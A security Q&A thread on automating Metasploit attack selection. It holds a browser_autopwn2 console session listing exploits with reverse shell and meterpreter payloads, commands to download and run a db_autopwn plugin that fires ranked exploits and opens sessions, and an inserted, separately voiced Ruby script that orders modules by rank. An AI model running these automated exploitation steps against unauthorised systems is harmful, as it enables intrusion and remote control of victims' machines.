3

I've been using Metasploit through the CLI and a little through Armitage. The tool in Armitage to find attacks, which gives you attacks that are more likely to work, is quite useful, so I was wondering what the CLI command to run that is, if there is one.

If it doesn't exist, what is the best way to filter through the modules and find what the best possible attacks are? Obviously I use search and filter based on service, OS, etc., but I don't have a way of knowing which module would be best suited compared to others.

dmnte
    metasploit has an optional db and commands to use it like armitage - is that what you are thinking about? – schroeder Apr 11 '16 at 14:48
  • After doing a service scan in Armitage you can select a tool from the menu that automatically finds attacks. I'm looking for the CLI command to do this same function – dmnte Apr 11 '16 at 14:51
  • 1
    ok - have you looked at the MSF db and related commands, then? – schroeder Apr 11 '16 at 14:54
  • This kind of question sounds like "where can I find the magic wand" – Sarastro Apr 15 '16 at 01:28

3 Answers

2

There used to be an autopwn option in Metasploit which would do what you are looking for, but it only targeted browsers. However, just like the name in Armitage implies, it selects a large set of exploits, fires them at the target and hopes for the best. Exploitation, if not done correctly, can do more harm than good. For example, an SMB exploit with the wrong target selected can crash the SMB service, which requires a manual restart of the machine to fix. That means not only will the person attacking the machine not get a session, but the attack can easily be detected as well.

Based upon these concerns, the autopwn functionality has been deprecated. Metasploit now has the AutoPwn2 module, which targets only browser-based exploits but in a much smarter way. This is better in the sense that exploits are only fired if the target is fingerprinted correctly, and then modules are fired based upon their ranks, which means more reliable exploits are attempted first. This way, if you are targeting a Flash exploit, you don't need to worry about the architecture and OS details of the connected users; the module will take care of it.

msf > use auxiliary/server/browser_autopwn2
msf auxiliary(browser_autopwn2) > show options

Module options (auxiliary/server/browser_autopwn2):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   EXCLUDE_PATTERN                   no        Pattern search to exclude specific modules
   INCLUDE_PATTERN                   no        Pattern search to include specific modules
   Retries          true             no        Allow the browser to retry the module
   SRVHOST          0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT          8080             yes       The local port to listen on.
   SSL              false            no        Negotiate SSL for incoming connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                           no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits


msf auxiliary(browser_autopwn2) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn2) > run
[*] Auxiliary module execution completed

[*] Searching BES exploits, please wait...
msf auxiliary(browser_autopwn2) > [*] Starting exploit modules...
[*] Starting listeners...
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Using URL: http://0.0.0.0:8080/

[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits
========

 Order  Rank       Name                                       Payload
 -----  ----       ----                                       -------
 1      Excellent  firefox_webidl_injection                   firefox/shell_reverse_tcp on 4442
 2      Excellent  firefox_tostring_console_injection         firefox/shell_reverse_tcp on 4442
 3      Excellent  firefox_svg_plugin                         firefox/shell_reverse_tcp on 4442
 4      Excellent  firefox_proto_crmfrequest                  firefox/shell_reverse_tcp on 4442
 5      Excellent  webview_addjavascriptinterface             android/meterpreter/reverse_tcp on 4443
 6      Excellent  samsung_knox_smdm_url                      android/meterpreter/reverse_tcp on 4443
 7      Great      adobe_flash_worker_byte_array_uaf          windows/meterpreter/reverse_tcp on 4444
 8      Great      adobe_flash_domain_memory_uaf              windows/meterpreter/reverse_tcp on 4444
 9      Great      adobe_flash_copy_pixels_to_byte_array      windows/meterpreter/reverse_tcp on 4444
 10     Great      adobe_flash_casi32_int_overflow            windows/meterpreter/reverse_tcp on 4444
 11     Great      adobe_flash_uncompress_zlib_uaf            windows/meterpreter/reverse_tcp on 4444
 12     Great      adobe_flash_shader_job_overflow            windows/meterpreter/reverse_tcp on 4444
 13     Great      adobe_flash_shader_drawing_fill            windows/meterpreter/reverse_tcp on 4444
 14     Great      adobe_flash_pixel_bender_bof               windows/meterpreter/reverse_tcp on 4444
 15     Great      adobe_flash_opaque_background_uaf          windows/meterpreter/reverse_tcp on 4444
 16     Great      adobe_flash_net_connection_confusion       windows/meterpreter/reverse_tcp on 4444
 17     Great      adobe_flash_nellymoser_bof                 windows/meterpreter/reverse_tcp on 4444
 18     Great      adobe_flash_hacking_team_uaf               windows/meterpreter/reverse_tcp on 4444
 19     Good       wellintech_kingscada_kxclientdownload      windows/meterpreter/reverse_tcp on 4444
 20     Good       ms14_064_ole_code_execution                windows/meterpreter/reverse_tcp on 4444
 21     Good       adobe_flash_uncompress_zlib_uninitialized  windows/meterpreter/reverse_tcp on 4444

[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://x.x.x.x:8080/
[*] Server started.
void_in
2

Having a look at the Armitage code for Find Attacks, it seems to implement its own version of an old Metasploit option, db_autopwn, that was deprecated back in 2011.

However, I have found a "recently" updated plugin (Aug 2017) for this option, which can be found here: metasploit-db_autopwn

To install, navigate to Metasploit's plugin directory (in Kali: /usr/share/metasploit-framework/plugins/)

Then download the plugin:

wget https://raw.githubusercontent.com/hahwul/metasploit-db_autopwn/master/db_autopwn.rb

Start up Metasploit and then load the plugin:

msf > load db_autopwn

You can check the options with db_autopwn -h

Scan and load hosts into your database as you usually would using db_nmap.

If you would like to scan and run exploits that have the rank of "great", automatically opening sessions, you can run:

msf > db_autopwn -p -R great -e -q

Sabe Barker
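Both answers above lean on the same idea: Metasploit's module rank ("Exploits with the highest ranking and newest will be tried first" in browser_autopwn2, and db_autopwn -R great in the plugin). If you want that ordering from the plain console, you can apply it yourself to the output of the search command. The script below is an added example and is not code from the page, from Armitage or from the Metasploit project. It parses a constructed sample in the shape of msfconsole search output (the module names are real Metasploit modules, but the dates and ranks shown are illustrative; check your own install), orders hits by rank and then by newest disclosure date, and separates out the modules that have a check method so you can run check before exploit rather than risk crashing a service the way the first answer describes. The rank values are Metasploit's own (manual 0 through excellent 600, as defined in the framework's Msf::RankingName); everything else, including the function names, is this example's assumption.

```ruby
# Added example, not code from the page or from the Metasploit project:
# order msfconsole `search` hits the way browser_autopwn2 and db_autopwn -R do,
# highest rank first and newest disclosure first within a rank.

# Metasploit's rank names and numeric values (Msf::RankingName in the framework).
RANKS = {
  'manual'    => 0,
  'low'       => 100,
  'average'   => 200,
  'normal'    => 300,
  'good'      => 400,
  'great'     => 500,
  'excellent' => 600,
}.freeze

# Constructed sample in the shape of `search` output. Module paths are real,
# but treat the dates, ranks and check flags as illustrative.
SAMPLE_SEARCH_OUTPUT = <<~OUT
  Matching Modules
  ================

     #  Name                                      Disclosure Date  Rank       Check  Description
     -  ----                                      ---------------  ----       -----  -----------
     0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average    Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     1  exploit/windows/smb/ms08_067_netapi       2008-10-28       great      Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption
     2  exploit/windows/smb/psexec                1999-01-01       manual     No     Microsoft Windows Authenticated User Code Execution
     3  exploit/multi/samba/usermap_script        2007-05-14       excellent  No     Samba "username map script" Command Execution
     4  auxiliary/scanner/smb/smb_version                          normal     No     SMB Version Detection
OUT

DATE_RE = /\A\d{4}-\d{2}-\d{2}\z/
MODULE_RE = %r{\A(exploit|auxiliary|post|payload|encoder|nop|evasion)/}

# Turn the text table into an array of hashes. A row is recognised by a
# leading index and a module path. The Disclosure Date column may be empty,
# which would shift every later column if we split blindly, so the date is
# detected rather than assumed.
def parse_search_output(text)
  text.each_line.map do |raw|
    tokens = raw.strip.split(/\s+/)
    next if tokens.size < 4
    next unless tokens[0].match?(/\A\d+\z/) && tokens[1].match?(MODULE_RE)
    date = tokens[2].match?(DATE_RE) ? tokens[2] : nil
    rest = date ? tokens[3..-1] : tokens[2..-1]
    rank, check = rest[0], rest[1]
    next unless RANKS.key?(rank) # skip anything that is not a module row
    { name: tokens[1], date: date, rank: rank, check: check == 'Yes', desc: rest[2..-1].join(' ') }
  end.compact
end

# Keep modules at or above min_rank and order them as the autopwn tools do:
# highest rank first, then newest disclosure date first (undated rows last).
def select_by_rank(modules, min_rank)
  threshold = RANKS.fetch(min_rank)
  modules.select { |m| RANKS[m[:rank]] >= threshold }
         .sort_by { |m| [-RANKS[m[:rank]], -(m[:date] || '0').delete('-').to_i] }
end

# Modules that implement check, so you can confirm the target is vulnerable
# with `check` before running `exploit` against a service you cannot restart.
def checkable(modules)
  modules.select { |m| m[:check] }
end

if __FILE__ == $0
  select_by_rank(parse_search_output(SAMPLE_SEARCH_OUTPUT), 'great').each do |m|
    puts format('%-9s %-10s %s', m[:rank], m[:date] || '', m[:name])
  end
end
```

To run it on your own results, capture the console with spool (a real msfconsole command that writes console output to a file), run your search, stop the spool and feed the file to parse_search_output instead of the constructed sample. The ordering is only a shortlist: the rank tells you how reliable the module is in general, not whether this host is the right target, which is what check and the version, patch level and architecture you gathered in the scan are for.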
0

Msfconsole has a search command. If you try search -h first you will get the valid syntax; with the search command you have options to find by CVE, title, platform name, etc. If you need to filter, use the Tab key the same way you use it in a Linux console; it will display the auto-complete options.

This road is much more manual than the Armitage search function, but if you spend the time to find those attacks by yourself it will give you real skills, beyond pressing the Find Attacks button in Armitage. Here is the Metasploit db tutorial; in this guide you will find how to start the db manually, how to import scans from other tools, etc.

As a matter of fact, the exploitation phase will depend directly on the information gathering phase, so don't limit the joy of exploitation to an automatic tool doing the job for you. There are plenty of exploits out there that are not included in Metasploit/Armitage and you will need to find them "out there"; it is always a good idea to look in famous places like Exploit Database. Always read an exploit and understand what it does, and how, before using it; you can harm yourself or others.

With all that said, good hunting.

https://www.offensive-security.com/metasploit-unleashed/using-databases/

schroeder
Sarastro
  • Based on your edit of the original question, the answer is in your study and understanding; the decision to attack MSSQL or SMB first, before SSH, and which exploit to select, will be up to your study: vulnerability history, OS version, language, even patch version. To really succeed at exploiting, waiting for an automated tool or answer is not the correct approach..., but that is just my opinion – Sarastro Apr 14 '16 at 02:01